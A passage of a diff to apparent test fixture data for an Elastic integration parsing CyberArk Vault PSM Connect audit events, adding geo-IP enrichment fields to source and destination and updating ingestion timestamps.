09:56:37\",\"IsoTimestamp\":\"2021-03-11T17:56:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -651,10 +696,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -736,7 +790,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331168Z", + "ingested": "2021-12-14T14:42:12.780168892Z", "original": "\u003c5\u003e1 2021-03-11T20:23:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:25\",\"IsoTimestamp\":\"2021-03-11T20:23:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -760,17 +814,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -850,7 +922,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331173800Z", + "ingested": "2021-12-14T14:42:12.780169288Z", "original": "\u003c5\u003e1 2021-03-14T13:49:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:37\",\"IsoTimestamp\":\"2021-03-14T13:49:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -874,17 +946,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -964,7 +1054,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331178100Z", + "ingested": "2021-12-14T14:42:12.780169694Z", "original": "\u003c5\u003e1 2021-03-14T13:50:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:50:43\",\"IsoTimestamp\":\"2021-03-14T13:50:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -988,17 +1078,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1076,7 +1184,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331182700Z", + "ingested": "2021-12-14T14:42:12.780170141Z", "original": "\u003c5\u003e1 2021-03-15T10:31:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:56\",\"IsoTimestamp\":\"2021-03-15T10:31:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1100,17 +1208,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1188,7 +1314,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331187900Z", + "ingested": "2021-12-14T14:42:12.780170529Z", "original": "\u003c5\u003e1 2021-03-15T10:33:39Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:39\",\"IsoTimestamp\":\"2021-03-15T10:33:39Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1212,17 +1338,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": 